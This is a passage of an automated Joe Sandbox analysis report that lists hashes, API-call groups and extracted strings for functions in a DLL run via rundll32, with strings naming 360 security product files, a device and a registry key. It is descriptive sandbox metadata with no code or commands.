                                                                  • Instruction ID: 0a7454a278269eadbb0ffce7cefadb2dc21e45630bc3a54506c3f9663c92b6cc
                                                                  • Opcode Fuzzy Hash: 391d25aba3b16aa89747ead15b5123f6840dc9e57769fc6a8d330c04b0e76dac
                                                                  • Instruction Fuzzy Hash: DC819572215B4986EB91DB64D4807DE77A0F7887E4F508226FA5E437E9DF38CA48CB40
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: Global$Stream$??3@CreateFromLockSizeUnlock
                                                                  • String ID: __Location__
                                                                  • API String ID: 3539542440-1240413640
                                                                  • Opcode ID: 258c331e991ad95c783ef0416d4c37d993b248583095014714736d7ddb22313c
                                                                  • Instruction ID: 0f7485e4f93bbca4fed8cf01455b67f1128db3508264a427a58b068d72c2ae23
                                                                  • Opcode Fuzzy Hash: 258c331e991ad95c783ef0416d4c37d993b248583095014714736d7ddb22313c
                                                                  • Instruction Fuzzy Hash: A6818072700A4885EB46DB75D8403DC3761F749BE8F548216EA2E577E5DF34CA89C300
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: CharNext
                                                                  • String ID:
                                                                  • API String ID: 3213498283-0
                                                                  • Opcode ID: f29f1362136db7183f5f3bb7661024df541b93d863d4b8e8a836a3b8ce17e584
                                                                  • Instruction ID: 1492bbbb0fb01b81f8d7bc8417cc5d1fdb32638e21ab672acd404a2c35c9a6c4
                                                                  • Opcode Fuzzy Hash: f29f1362136db7183f5f3bb7661024df541b93d863d4b8e8a836a3b8ce17e584
                                                                  • Instruction Fuzzy Hash: 5B417236615A9881FBA2CF11D4143A833E0FB5CBD4F44C412EB8A47795EF78C7AA9305
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: Value$_time64$HeapProcess
                                                                  • String ID: %s_count$%s_lasttime$CloudCfg
                                                                  • API String ID: 1319719158-610660357
                                                                  • Opcode ID: 633e9513b59cb82dbd4c42a8dfc42ca5507bcd6ec68c6f3b38eaf980b99686d7
                                                                  • Instruction ID: 831a43b99bf02356c207f364941f14581f3732c075b2ce428cfbfee20bf611f1
                                                                  • Opcode Fuzzy Hash: 633e9513b59cb82dbd4c42a8dfc42ca5507bcd6ec68c6f3b38eaf980b99686d7
                                                                  • Instruction Fuzzy Hash: 6D416CB2701B4486EB51DB29D84079D37A1FB89BF8F048325AA2E577E5DF38C688C341
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: File$AppendCloseCreateHandleModuleNamePathReadSizememmove
                                                                  • String ID: ..\config\msgcenter64.dat
                                                                  • API String ID: 1552649294-925171115
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmp
• Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmp
• Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
• Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
• Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
Similarity
• API ID: Path$AppendFilememset$CloseExistsModuleName_wcsicmp
• String ID: safemon\360EDRSensor.exe
• API String ID: 2297386589-1382049097
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmp
• Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmp
• Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
• Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
• Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
Similarity
• API ID: Path$AppendFilememset$CloseExistsModuleName_wcsicmp
• String ID: safemon\360ExtHost.exe
• API String ID: 2297386589-1382862812
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmp
• Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmp
• Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
• Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
• Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
Similarity
• API ID: AddressCloseHandleModuleOpenProc
• String ID: Advapi32.dll$RegOpenKeyTransactedW
• API String ID: 823179699-3913318428
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmp
• Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmp
• Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
• Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
• Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
Similarity
• API ID: AcquireContextCriticalCryptSection_time64$EnterErrorLastLeavememsetrandsrand
• String ID:
• API String ID: 1109857607-0
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmp
• Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmp
• Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
• Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
• Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
Similarity
• API ID: Heap$Free$CloseHandleProcess$ExceptionLockMutexReleaseThrowUnlockWalk
• String ID:
• API String ID: 2337826640-0
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmp
• Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmp
• Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
• Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
• Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
Similarity
• API ID: FreeString
• String ID:
• API String ID: 3341692771-0
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmp
• Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmp
• Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
• Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
• Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
Similarity
• API ID: CloseControlCreateCurrentDeviceFileHandleProcess
• String ID: L "$\\.\360SelfProtection
• API String ID: 3778458602-907869749
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmp
• Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmp
• Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
• Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
• Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
Similarity
• API ID: ByteCharMultiWide$??3@
• String ID:
• API String ID: 652292005-0
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmp
• Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmp
• Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
• Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
• Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
Similarity
• API ID: wcsstr$_errnomemmove
• String ID:
• API String ID: 3323953840-0
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmp
• Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmp
• Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
• Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
• Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
Similarity
• API ID: Deinstall$ProviderProvider32$CleanupStartup
• String ID:
• API String ID: 348239931-0
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmp
• Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmp
• Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
• Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
• Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
Similarity
• API ID: String$??3@Free$??2@AllocHeapProcess
• String ID:
• API String ID: 195827-0
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmp
• Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmp
• Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
• Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
• Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
Similarity
• API ID: String$??3@Free$??2@AllocHeapProcess
• String ID:
• API String ID: 195827-0
                                                                  • Opcode ID: ceda01c74325736d26a0411a727c02681ceb51477494a67f089079f3182e5468
                                                                  • Instruction ID: d6e040c62356dd28a52f4054929385a923e12d2376c870478276763e31a13ced
                                                                  • Opcode Fuzzy Hash: ceda01c74325736d26a0411a727c02681ceb51477494a67f089079f3182e5468
                                                                  • Instruction Fuzzy Hash: 9D516F33701B4982EB469F65D85039E63A0FB89FA4F498221EB295B7D9DF38C549C340
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: String$??3@Free$??2@AllocHeapProcess
                                                                  • String ID:
                                                                  • API String ID: 195827-0
                                                                  • Opcode ID: 1487f1b9042455cadd1f594916249c517a85c0241772127b20d59336a7db92ce
                                                                  • Instruction ID: b9a7bc9aefba1d0cd95c21a72bfdce90d94dfcaa7ac1bda6bd9d80d9113677c1
                                                                  • Opcode Fuzzy Hash: 1487f1b9042455cadd1f594916249c517a85c0241772127b20d59336a7db92ce
                                                                  • Instruction Fuzzy Hash: 55516032701B4882EB469F65D85039E73A0FB49FE4F098625EB69577D9DF38C649C380
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: String$??3@Free$AttributesFile$??2@AllocHeapProcess
                                                                  • String ID:
                                                                  • API String ID: 2343307612-0
                                                                  • Opcode ID: 8e393e3a3852b3cedc11bf39ea6ffb031ff90eabb787ce897587cb6f9badf564
                                                                  • Instruction ID: 3edc698dfee31cca13762dbc840380725e1013da3230f8d99093220343b8c6e9
                                                                  • Opcode Fuzzy Hash: 8e393e3a3852b3cedc11bf39ea6ffb031ff90eabb787ce897587cb6f9badf564
                                                                  • Instruction Fuzzy Hash: 21515F32701B4882EB46DF65D85039D73A0FB49FA4F098225EB695B7E9DF38C949C380
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: lstrcmpimemset
                                                                  • String ID: ShellEx\IconHandler$\DefaultIcon$clsid\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon\${42042206-2D85-11D3-8CFF-005004838597}
                                                                  • API String ID: 3784069311-1340094651
                                                                  • Opcode ID: 0a12214a811aa3540a0b94e6fb55089740eaeb8575e012286690255a8f8d330d
                                                                  • Instruction ID: 9f0af0b831dc55336fcff299f0060eabbe44d87f67dffe850d980bb31fffbbb0
                                                                  • Opcode Fuzzy Hash: 0a12214a811aa3540a0b94e6fb55089740eaeb8575e012286690255a8f8d330d
                                                                  • Instruction Fuzzy Hash: 0251A672601E4982EB52DB29D8817DE6760FB897F4F508312FA6D436E5DF38C689C740
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSection$EnterEnvironmentExpandLeaveStrings
                                                                  • String ID:
                                                                  • API String ID: 3103530258-0
                                                                  • Opcode ID: 4711d94ae21e721216315d7d413d31c061a842b8496e77f250252f344626d692
                                                                  • Instruction ID: b0c21a69e9994dd49745b429a24057b93f4d6bf7018e4c24e81fb4468a7e2a6c
                                                                  • Opcode Fuzzy Hash: 4711d94ae21e721216315d7d413d31c061a842b8496e77f250252f344626d692
                                                                  • Instruction Fuzzy Hash: 0051AF32711A4882EB82CF29D8843DE7761F789BE8F549211FE69176A5DF39C64AC700
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: CloseOpenQueryValuewcsstr
                                                                  • String ID: "%s" %s$/elevated
                                                                  • API String ID: 1248106594-1382985213
                                                                  • Opcode ID: 7d994b47a6feae35010406933b82370a9ece06ded3bcb5ee78e307a99859ddb1
                                                                  • Instruction ID: f3329ece6a2879d43efc8f52936060a6c90d44f89bf07b9cf1bbe3f09b4200fa
                                                                  • Opcode Fuzzy Hash: 7d994b47a6feae35010406933b82370a9ece06ded3bcb5ee78e307a99859ddb1
                                                                  • Instruction Fuzzy Hash: E241A432702B4489EB95CF65D8407DC33A5FB88BD4F15861AAE5E53BA4DF34C659C340
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                    • Part of subcall function 000000018006A424: RegOpenKeyExW.ADVAPI32(?,?,?,?,00000000,0000000180068993,?,?,?,?,00000001,00000000,?,0000000180068D41), ref: 000000018006A44B
                                                                  • memset.MSVCRT ref: 00000001800689A4
                                                                    • Part of subcall function 000000018006A490: RegQueryValueExW.ADVAPI32(?,?,?,?,?,?,00000001800689D0,?,?,?,?,00000001,00000000,?,0000000180068D41), ref: 000000018006A4A9
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: OpenQueryValuememset
                                                                  • String ID: ExpirationDate$IssueDate$Operator$SOFTWARE\360MachineSignature$SignData
                                                                  • API String ID: 733315865-1479031278
                                                                  • Opcode ID: 024b379d581b3895d461dc1fafaaa22704cd15f8aacd44fa0de35045f287b812
                                                                  • Instruction ID: ca32e24e8d646fa6672ed224415891838e44a9bb2fa0ab3c5403e0472a1cb0df
                                                                  • Opcode Fuzzy Hash: 024b379d581b3895d461dc1fafaaa22704cd15f8aacd44fa0de35045f287b812
                                                                  • Instruction Fuzzy Hash: DA411972B00B149AFB92DBA5D8447DD73B5BB487C8F148A16AE6853B58EF34C708CB00
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: ??2@memset$??3@memmove
                                                                  • String ID:
                                                                  • API String ID: 1691405456-0
                                                                  • Opcode ID: 898b7f6a28002f066823eb5036c047e985fc53dc141f5cbb7a005687aa805986
                                                                  • Instruction ID: 4c03d6f838081a40abf5c4ade735ff692b1a288c63e34611b63fa987e6e302c4
                                                                  • Opcode Fuzzy Hash: 898b7f6a28002f066823eb5036c047e985fc53dc141f5cbb7a005687aa805986
                                                                  • Instruction Fuzzy Hash: C7419F72311B9C81EA95CB65E5483AC73A5E748BE0F25C726AA7D07BD5DF38C289C310
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSection$CleanupEnterErrorInstallLastLeaveNameSpaceStartupmemset
                                                                  • String ID:
                                                                  • API String ID: 3860525367-0
                                                                  • Opcode ID: 566063b2480ce26a8a1017dda99dddd59a3f866f59b7cd308274edefec3830af
                                                                  • Instruction ID: 37d746e663b56e28a6a3e394405e8b675d481f719bc3bdb0db42ce8d24bf20fd
                                                                  • Opcode Fuzzy Hash: 566063b2480ce26a8a1017dda99dddd59a3f866f59b7cd308274edefec3830af
                                                                  • Instruction Fuzzy Hash: 57316E31700A4886F6A29F25EC443E973A0FB8DBD5F548531B96A972A1DF39C7898700
